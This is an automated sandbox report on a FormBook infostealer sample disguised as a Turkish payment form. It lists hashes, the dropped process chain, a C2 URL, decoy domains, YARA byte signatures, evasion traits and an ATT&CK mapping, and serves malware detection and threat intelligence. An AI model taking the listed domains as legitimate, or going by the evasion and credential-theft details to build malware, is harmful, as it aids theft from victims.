Edit tour

Windows Analysis Report
#U00d6DEME FORMU.exe

Overview

General Information

Sample Name:	#U00d6DEME FORMU.exe
Analysis ID:	635282
MD5:	0204546cc8568a60d97947c5fd6ccd49
SHA1:	ff7c492dd728279cd763af6fa525606431fc8db0
SHA256:	eddc1ee1fafda4fe7cf6d114276c992806f33d7527d346464bad7033875fbd66
Tags:	exeFormbookgeoTUR
Infos:

Detection

FormBook

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

C2 URLs / IPs found in malware configuration

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Drops PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

#U00d6DEME FORMU.exe (PID: 6304 cmdline: "C:\Users\user\Desktop\#U00d6DEME FORMU.exe" MD5: 0204546CC8568A60D97947C5FD6CCD49)

erltu.exe (PID: 6336 cmdline: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph MD5: 2603B527A791BAA25AC589C33B254470)

erltu.exe (PID: 6356 cmdline: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph MD5: 2603B527A791BAA25AC589C33B254470)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.liuchenggang.com/b0y1/"], "decoy": ["newindexpress.com", "tg5szfdz.xyz", "aims1881.com", "bonaegroup.com", "be99caboi8.xyz", "weddingcentrepieces.com", "acigdmodel.com", "ketotax.info", "learnedware.com", "learning-rich-work.store", "multipreset.store", "flyttfirmaorebro.com", "58bilisim.xyz", "joseketofitdiet.site", "duomeishop.com", "programacaozerobarriga.site", "gygezau517.xyz", "awesometutorials.xyz", "hwvzfn3t.xyz", "nycexoticbullies.com", "smallbizmaker.com", "isarfeuer.com", "wacker-silicones.com", "tongtoto.com", "xofitessentials.com", "begep.space", "paperbackbookbox.com", "ihhsiljc.beauty", "jankarbaniye.com", "boli-12.xyz", "gridwriter.com", "377manhua.com", "willywaw98cop.com", "acumelet.com", "theupgradeexperiencemedia.com", "pimientamultimedia.com", "phoenixgold.xyz", "plunderdseign.com", "erdberrehausgsd.net", "aboutsprouts.com", "castle-clash.com", "nwcabin.com", "kurtizanki-spb.com", "yqphx.xyz", "casinowithout.com", "jctcopera.com", "antalyaluxuryvilla.xyz", "sagedidthis.com", "144z.xyz", "iska4peps.life", "rightthewrong.biz", "zib0bsivacf8.xyz", "beijingzhongruanchuangheng.site", "jylfxx.net", "newsletterexperience.com", "rnrprowash.com", "bylunakdy.com", "upasev.online", "businessreputationmanager.com", "kidsacooking.com", "brangusprimebeef.com", "nickhaven.com", "o1apopdpzhah.xyz", "negociodigital.store"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.erltu.exe.b40000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.erltu.exe.b40000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.erltu.exe.b40000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
1.2.erltu.exe.b40000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.erltu.exe.b40000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.erltu.exe.b40000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.liuchenggang.com/b0y1/"], "decoy": ["newindexpress.com", "tg5szfdz.xyz", "aims1881.com", "bonaegroup.com", "be99caboi8.xyz", "weddingcentrepieces.com", "acigdmodel.com", "ketotax.info", "learnedware.com", "learning-rich-work.store", "multipreset.store", "flyttfirmaorebro.com", "58bilisim.xyz", "joseketofitdiet.site", "duomeishop.com", "programacaozerobarriga.site", "gygezau517.xyz", "awesometutorials.xyz", "hwvzfn3t.xyz", "nycexoticbullies.com", "smallbizmaker.com", "isarfeuer.com", "wacker-silicones.com", "tongtoto.com", "xofitessentials.com", "begep.space", "paperbackbookbox.com", "ihhsiljc.beauty", "jankarbaniye.com", "boli-12.xyz", "gridwriter.com", "377manhua.com", "willywaw98cop.com", "acumelet.com", "theupgradeexperiencemedia.com", "pimientamultimedia.com", "phoenixgold.xyz", "plunderdseign.com", "erdberrehausgsd.net", "aboutsprouts.com", "castle-clash.com", "nwcabin.com", "kurtizanki-spb.com", "yqphx.xyz", "casinowithout.com", "jctcopera.com", "antalyaluxuryvilla.xyz", "sagedidthis.com", "144z.xyz", "iska4peps.life", "rightthewrong.biz", "zib0bsivacf8.xyz", "beijingzhongruanchuangheng.site", "jylfxx.net", "newsletterexperience.com", "rnrprowash.com", "bylunakdy.com", "upasev.online", "businessreputationmanager.com", "kidsacooking.com", "brangusprimebeef.com", "nickhaven.com", "o1apopdpzhah.xyz", "negociodigital.store"]}

Multi AV Scanner detection for submitted file

Source: #U00d6DEME FORMU.exe	Virustotal: Detection: 52%			Perma Link
Source: #U00d6DEME FORMU.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Source: Yara match	File source: 1.2.erltu.exe.b40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.erltu.exe.b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.liuchenggang.com/b0y1/

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Virustotal: Detection: 47%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	ReversingLabs: Detection: 43%

Source: 1.2.erltu.exe.b40000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: #U00d6DEME FORMU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:

Binary string: C:\ffsoc\ohboce\qvij\0902cf37fdf1425d9289d1e37d1cf733\cdrrer\lqscatwa\Release\lqscatwa.pdb source: #U00d6DEME FORMU.exe, 00000000.00000002.314547108.00000000026B3000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME FORMU.exe, 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmp, erltu.exe, 00000001.00000000.276075436.000000000102B000.00000002.00000001.01000000.00000004.sdmp, erltu.exe, 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmp, erltu.exe, 00000002.00000002.542844457.000000000102B000.00000002.00000001.01000000.00000004.sdmp, erltu.exe.0.dr, nsz96AE.tmp.0.dr

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Code function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405426
Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Code function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	0_2_00405D9C
Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Code function: 0_2_004026A1 FindFirstFileA,	0_2_004026A1

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.liuchenggang.com/b0y1/

Source: #U00d6DEME FORMU.exe, 00000000.00000002.314392216.00000000006BA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Code function: 0_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FDD

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.erltu.exe.b40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.erltu.exe.b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.erltu.exe.b40000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.erltu.exe.b40000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.erltu.exe.b40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.erltu.exe.b40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: #U00d6DEME FORMU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 1.2.erltu.exe.b40000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.erltu.exe.b40000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.erltu.exe.b40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.erltu.exe.b40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Code function: 0_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004032FA

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Code function: 0_2_004047EE	0_2_004047EE
Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Code function: 0_2_00406083	0_2_00406083
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_0102496E	1_2_0102496E
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_0102959D	1_2_0102959D
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_01026880	1_2_01026880
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_010285D1	1_2_010285D1
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_010138EE	1_2_010138EE
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_01026DF2	1_2_01026DF2
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_01026880	1_2_01026880
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_01026880	1_2_01026880
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_01027364	1_2_01027364
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_0102496E	1_2_0102496E
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_010167AE	1_2_010167AE
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_007F0A2C	1_2_007F0A2C

Source: #U00d6DEME FORMU.exe	Virustotal: Detection: 52%
Source: #U00d6DEME FORMU.exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

File read: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Jump to behavior

Source: #U00d6DEME FORMU.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U00d6DEME FORMU.exe "C:\Users\user\Desktop\#U00d6DEME FORMU.exe"
Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Process created: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Process created: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph
Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Process created: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Process created: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph	Jump to behavior

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

File created: C:\Users\user\AppData\Local\Temp\nsz96AD.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winEXE@5/4@0/0

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Code function: 0_2_00402078 CoCreateInstance,MultiByteToWideChar,

0_2_00402078

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Code function: 0_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404333

Source:

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Code function: 1_2_0101F035 push ecx; ret

1_2_0101F048

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Code function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405DDA

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

File created: C:\Users\user\AppData\Local\Temp\erltu.exe

Jump to dropped file

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Code function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405426
Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Code function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	0_2_00405D9C
Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	Code function: 0_2_004026A1 FindFirstFileA,	0_2_004026A1

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe	API call chain: ExitProcess graph end node			graph_0-3361
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Code function: 1_2_0102457B IsDebuggerPresent,

1_2_0102457B

Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_007F061D mov eax, dword ptr fs:[00000030h]	1_2_007F061D
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_007F06F7 mov eax, dword ptr fs:[00000030h]	1_2_007F06F7
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_007F0772 mov eax, dword ptr fs:[00000030h]	1_2_007F0772
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_007F0736 mov eax, dword ptr fs:[00000030h]	1_2_007F0736
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_007F03F8 mov eax, dword ptr fs:[00000030h]	1_2_007F03F8

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Code function: 1_2_01024395 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_01024395

Source: C:\Users\user\Desktop\#U00d6DEME FORMU.exe

Code function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405DDA

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Code function: 1_2_0102538A GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,

1_2_0102538A

Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_010214BB SetUnhandledExceptionFilter,		1_2_010214BB
Source: C:\Users\user\AppData\Local\Temp\erltu.exe	Code function: 1_2_010214EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_010214EC

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Process created: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Code function: 1_2_0101FE73 cpuid

1_2_0101FE73

Source: C:\Users\user\AppData\Local\Temp\erltu.exe

Code function: 1_2_01020FE8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_01020FE8

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.erltu.exe.b40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.erltu.exe.b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.erltu.exe.b40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.erltu.exe.b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.280690320.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Native API	Path Interception	11 Process Injection	11 Process Injection	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	LSASS Memory	13 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
#U00d6DEME FORMU.exe	52%	Virustotal		Browse
#U00d6DEME FORMU.exe	37%	ReversingLabs	Win32.Trojan.FormBook

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\erltu.exe	48%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\erltu.exe	44%	ReversingLabs	Win32.Trojan.FormBook

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.erltu.exe.b40000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
www.liuchenggang.com/b0y1/	1%	Virustotal		Browse
www.liuchenggang.com/b0y1/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.liuchenggang.com/b0y1/	true	1%, Virustotal, Browse Avira URL Cloud: malware	low

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	635282
Start date and time: 27/05/202218:22:58	2022-05-27 18:22:58 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
